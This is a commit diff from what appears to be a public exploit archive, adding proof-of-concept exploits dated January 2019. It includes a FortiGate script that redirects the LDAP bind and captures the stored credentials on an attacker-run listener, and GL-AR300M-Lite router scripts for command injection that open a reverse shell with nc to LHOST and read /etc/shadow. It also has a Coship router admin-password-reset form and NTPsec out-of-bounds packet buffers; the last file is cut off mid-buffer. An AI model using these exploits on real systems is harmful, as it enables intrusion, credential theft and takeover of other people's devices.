DB: 2019-01-17

18 changes to exploits/shellcodes Spotify 1.0.96.181 - 'Proxy configuration' Denial of Service (PoC) NTPsec 1.1.2 - 'ctl_getitem' Out-of-Bounds Read (PoC) NTPsec 1.1.2 - 'ntp_control' Out-of-Bounds Read (PoC) NTPsec 1.1.2 - 'ntp_control' Authenticated NULL Pointer Dereference (PoC) NTPsec 1.1.2 - 'config' Authenticated Out-of-Bounds Write Denial of Service (PoC) Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory in Invalid Array Length WebKit JSC JIT - GetIndexedPropertyStorage Use-After-Free Microsoft Windows 10 - 'RestrictedErrorInfo' Unmarshal Section Handle Use-After-Free Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit) FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure Roxy Fileman 1.4.5 - Arbitrary File Download doorGets CMS 7.0 - Arbitrary File Download ShoreTel / Mitel Connect ONSITE 19.49.5200.0 - Remote Code Execution GL-AR300M-Lite 2.27 - Authenticated Command Injection / Arbitrary File Download / Directory Traversal Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit
2019-01-17 05:01:45 +00:00 · 2019-01-17 05:01:45 +00:00 · fa261f0558
commit fa261f0558
parent bb44caca27
19 changed files with 1177 additions and 1 deletions
--- a/exploits/hardware/webapps/46171.py
+++ b/exploits/hardware/webapps/46171.py
@ -0,0 +1,144 @@
+#/usr/bin/python3
+
+"""
+CVE-2018-13374
+Publicado por Julio Ureña (PlainText)
+Twitter: @JulioUrena
+Blog Post: https://plaintext.do/My-1st-CVE-Capture-LDAP-Credentials-From-FortiGate-EN/
+Referencia: https://fortiguard.com/psirt/FG-IR-18-157
+
+Ejemplo: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP 
+Ejemplo con Proxy: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP  --proxy http://127.0.0.1:8080
+"""
+
+from threading import Thread
+from time import sleep
+import json, requests, socket, sys, re, click
+
+# Disable SSL Warning
+requests.packages.urllib3.disable_warnings()
+
+# To keep the Cookies after login.
+s = requests.Session()
+	
+def AccessFortiGate(fortigate_url, username, password, proxy_addr):
+	url_login = fortigate_url+'/logincheck'
+
+	# Pass username and Password
+	payload = {"ajax": 1, "username":username, "secretkey":password}
+
+	# verify=False - to avoid SSL warnings
+	r = s.post(url_login, data=payload, proxies=proxy_addr, verify=False)
+
+	if s.cookies:
+		return True
+	else:
+		return False
+	
+
+def TriggerVuln(fortigate_url, ip, proxy_addr):
+	print("[+] Triggering Vulnerability")
+	# Access LDAP Server TAB
+	r = s.get(fortigate_url+'/p/user/ldap/json/',cookies=requests.utils.dict_from_cookiejar(s.cookies), proxies=proxy_addr, verify=False)
+
+	# Load the response in a json object 
+	json_data = json.loads(r.text)
+
+	# Assign values based on FortiGate LDAP configuration
+	name = json_data['source'][0]['name']
+	username = json_data['source'][0]['username']
+	port = int(json_data['source'][0]['port'])
+	cnid = json_data['source'][0]['cnid']
+	dn = json_data['source'][0]['dn']
+	ca = json_data['source'][0]['ca-cert']
+	
+	thread = Thread(target = GetCreds, args = (ip, port))
+	thread.start()
+	sleep(1)
+	
+	print("[+] Username: ", username)
+	
+	# Create json object for the vulnerable request, changing the server and setting up secure to 0
+	ldap_request = {"info_only":1,"mkey":name,"ldap":{"server":ip,"port":port,"cn_id":cnid,"username":username,"dn":dn,"secure":0,"ca":ca,"type":2}}
+
+	# Trigger the vulnerability
+	r = s.get(fortigate_url+'/api/ldap?json='+str(ldap_request), cookies=requests.utils.dict_from_cookiejar(s.cookies),proxies=proxy_addr, verify=False)
+	r.close()
+
+def GetCreds(server, port):
+	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	
+	# Allow to reuse the server/port in case of: OSError: [Errno 98] Address already in use
+	sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+
+	server_address = (server, port)
+	sock.bind(server_address)
+
+	sock.listen()
+	credentials = ''
+
+	while True:
+		print('[+] Waiting Fortigate connection ...')
+		c, client_address = sock.accept()		
+		try:
+			while True:
+				data = c.recv(1024)
+				credentials = str(data)
+				# \\x80\\ was common with 3 different passwords / user names, that's why it's been used as reference. 
+				# It separe the username and the password
+				ldap_pass = re.sub(r'.*\\x80\\','',credentials) #.replace("'","")
+				print("[+] Password: ", ldap_pass[3:-1])
+				break
+		finally:
+			c.shutdown(socket.SHUT_RDWR)
+			c.close()
+			sock.shutdown(socket.SHUT_RDWR)
+			sock.close()
+
+		if credentials:
+			break
+
+def print_help(self, param, value):
+	if value is False:
+		return
+	click.echo(self.get_help())
+	self.exit()
+
+@click.command()
+@click.option('-f', '--fortigate-url', 'fortigate_url', help='FortiGate URL.', required=True)
+@click.option('-u', '--username', 'username', help='Username to login into Fortigate. It can be a read only user.', required=True)
+@click.option('-p', '--password', 'password', help='Password to login into FortiGate.', required=True)
+@click.option('-i', '--ip', 'ip', help='Host IP to send the credentails.', required=True)
+@click.option('-pr', '--proxy', 'proxy', default=None, help='Proxy protocol and IP and Port.', required=False)
+@click.option('-h', '--help', 'help', help='Help', is_flag=True, callback=print_help, expose_value=False, is_eager=False)
+@click.pass_context
+
+
+def main(self, fortigate_url, username, password, ip, proxy):
+	if not fortigate_url and not username and not password:
+		print_help(self, None,  value=True)
+		print("[-] For usage reference use --help")
+		exit(0)
+
+	# Configure Proxy For Web Requests
+	proxy_addr = {
+	        'http': proxy,
+	        'https': proxy
+	}
+	message = """[+] CVE-2018-13374
+[+] Publicado por Julio Ureña (PlainText)
+[+] Blog: https://plaintext.do
+[+] Referencia: https://fortiguard.com/psirt/FG-IR-18-157
+"""
+	print(message)
+
+	if AccessFortiGate(str(fortigate_url),username, password, proxy_addr):
+		print("[+] Logged in.")
+		sleep(1)
+		TriggerVuln(str(fortigate_url), ip, proxy_addr)
+	else:
+		print("[-] Unable to login. Please check the credentials and Fortigate URL.")
+		exit(0)
+
+if __name__ == "__main__":
+	main()
--- a/exploits/hardware/webapps/46179.txt
+++ b/exploits/hardware/webapps/46179.txt
@ -0,0 +1,76 @@
+# Exploit Title: GL-AR300M-Lite Authenticated Command injection - Arbitrary file download - Directory Traversal
+# Date: 15/1/2019
+# Exploit Author: Pasquale Turi aka boombyte
+# Vendor Homepage: https://www.gl-inet.com/
+# Software Link: https://www.gl-inet.com/products/gl-ar300m/
+# Version: Firmware version 2.27
+# CVE : CVE-2019-6272 - CVE-2019-6273 - CVE-2019-6274 - CVE-2019-6275
+
+
+#CVE-2019-6272 PoC (Command injection):
+
+import requests
+
+rhost='RHOST'
+lhost='LHOST' 
+lport ='LPORT'
+password='PASSWORD'
+r=requests.get('http://'+rhost+'/login.html')
+cookie=r.cookies
+r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)
+header={'X-CSRF-TOKEN':r2.text[13:45]}
+r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})
+header={'X-CSRF-TOKEN':r3.text[31:63]}
+r4=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r3.cookies,data={'action':'settimezone','timezone':'`nc '+lhost+' '+lport+' -e /bin/ash`'})
+
+
+#CVE-2019-6273 (Arbitrary file download) PoC:
+
+import requests
+
+rhost='RHOST'
+password='PASSWORD'
+file_path='/etc/shadow'
+r=requests.get('http://'+rhost+'/login.html')
+cookie=r.cookies
+r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)
+header={'X-CSRF-TOKEN':r2.text[13:45]}
+r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})
+header={'X-CSRF-TOKEN':r3.text[31:63]}
+r4=requests.get('http://'+rhost+'/cgi-bin/download_file?/mnt/..'+file_path,headers=header,cookies=r3.cookies)
+print r4.text
+
+
+#CVE-2019-6274 (Path Trasversal) PoC:
+
+import requests
+
+rhost='RHOST'
+password='PASSWORD'
+path='/'
+r=requests.get('http://'+rhost+'/login.html')
+cookie=r.cookies
+r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)
+header={'X-CSRF-TOKEN':r2.text[13:45]}
+r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})
+header={'X-CSRF-TOKEN':r3.text[31:63]}
+r4=requests.get('http://'+rhost+'/cgi-bin/storage_cgi?id=2&pwd='+path,headers=header,cookies=r3.cookies)
+print r4.text
+
+
+#CVE-2019-6275 (Another command injection):
+
+import requests
+
+rhost='RHOST'
+lhost='LHOST' 
+lport ='LPORT'
+password='PASSWORD'
+r=requests.get('http://'+rhost+'/login.html')
+cookie=r.cookies
+r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)
+header={'X-CSRF-TOKEN':r2.text[13:45]}
+r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})
+header={'X-CSRF-TOKEN':r3.text[31:63]}
+r4=requests.post('http://'+rhost+'/cgi-bin/firmware_cgi?action=setautoupdate&auto_update=off&update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\'%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23&_=1547223055153 ',headers=header,cookies=r3.cookies,)
+print r4.text
--- a/exploits/hardware/webapps/46180.html
+++ b/exploits/hardware/webapps/46180.html
@ -0,0 +1,32 @@
+<!--
+# Exploit Title: Coship Wireless Router – Unauthenticated Admin Password Reset
+# Date: 15.01.2019
+# Exploit Author: Adithyan AK
+# Vendor Homepage: http://en.coship.com/
+# Category: Hardware (Wifi Router)
+# Affected Versions : Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49.
+# Tested on: MacOS Mojave v.10.14
+# CVE: CVE-2019-6441
+
+# Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html
+# Open Exploit.html with your Browser
+# Click on “Submit request”
+# Password of the admin will now be changed as "password123"
+
+# PoC :
+-->
+
+<html>
+  <!-- Change the X.X.X.X with the router's IP address -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://X.X.X.X/apply.cgi" method="POST">
+      <input type="hidden" name="page" value="regx/management/accounts.asp" />
+      <input type="hidden" name="http_username" value="admin" />
+      <input type="hidden" name="http_passwd" value="password123" />
+      <input type="hidden" name="usr_confirm_password" value="password123" />
+      <input type="hidden" name="action" value="Submit" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
--- a/exploits/linux/dos/46175.py
+++ b/exploits/linux/dos/46175.py
@ -0,0 +1,111 @@
+#!/usr/bin/env python
+# Exploit Title: ntpsec 1.1.2 OOB read Proof of concept
+# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
+# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
+# Website: https://dumpco.re/bugs/ntpsec-oobread1 
+# Vendor Homepage: https://ntpsec.org/ 
+# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz 
+# Affected versions: ntpsec 1.1.1, 1.1.2
+# CVE: CVE-2019-6443
+# Note: this PoC does not crash the target
+
+import sys
+import socket
+
+buf = ("\x4e\x02\x03\xec\x00\x00\x00\x00\x00\x00\x02\xc7\x74\x63\x3d\x10" +
+      "\x00\xaf\x2c\x2c\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b" +
+      "\xce\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b" +
+      "\x0b\x0b\x20\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b" +
+      "\x0b\x0b\x2d\x27\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x80\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x00\x00\x00\x02\xc7\x74\x63\x3d\x10\x00\xaf\x2c\x2c" +
+      "\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b\x0b\x0b\x20\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b\x0b\x0b\x2d\x27" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x80\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0e\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x4b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0e\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x4b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
+      "\x0b\x07")
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+sock.sendto(buf, ('127.0.0.1', 123))
+
+
+
+
+
+Magnus
--- a/exploits/linux/dos/46176.py
+++ b/exploits/linux/dos/46176.py
@ -0,0 +1,56 @@
+#!/usr/bin/env python
+# Exploit Title: ntpsec 1.1.2 OOB read Proof of concept
+# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
+# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
+# Website: https://dumpco.re/bugs/ntpsec-oobread2 
+# Vendor Homepage: https://ntpsec.org/ 
+# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz 
+# Affected versions: ntpsec 1.1.1, 1.1.2
+# CVE: CVE-2019-6444
+# Note: this PoC does not crash the target
+
+import sys
+import socket
+
+buf = ("\x8e\x0a\x6b\xc3\x80\x00\x00\x00\x00\x00\x02\x48\x47\x50\x53\x73" +
+       "\x6b\xc3\x80\x00\x00\x00\x00\x00\x02\x48\x47\x50\x53\x73\xdd\xb5" +
+       "\xc9\x64\xcf\x8a\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x44\x47\x50\x10\x00\x47\xb5\xc9\xcf\x97\xbb\x00\xe5\xf8\xdd" +
+       "\xb5\xc9\x6b\xd8\x7f\x81\xc2\xdd\xb5\xc9\x6b\xdd\x80\xe4\xe4\xe5" +
+       "\x9f\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x21\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\xc5\xbf\xbc\x6b\xd8\x7f\x82\x00\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x42\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\xed\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x00\x00\xe4\xe4\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x00" +
+       "\x01\x00\x00\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x29\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" +
+       "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x97\x48\xdd\xb5\xc9\x6b" +
+       "\xbb\xe8\x08\xf8\xdd\xba\xc9\x6b\xd8\x7f\x82\xc2\xdd\xb5\xc9\x6b" +
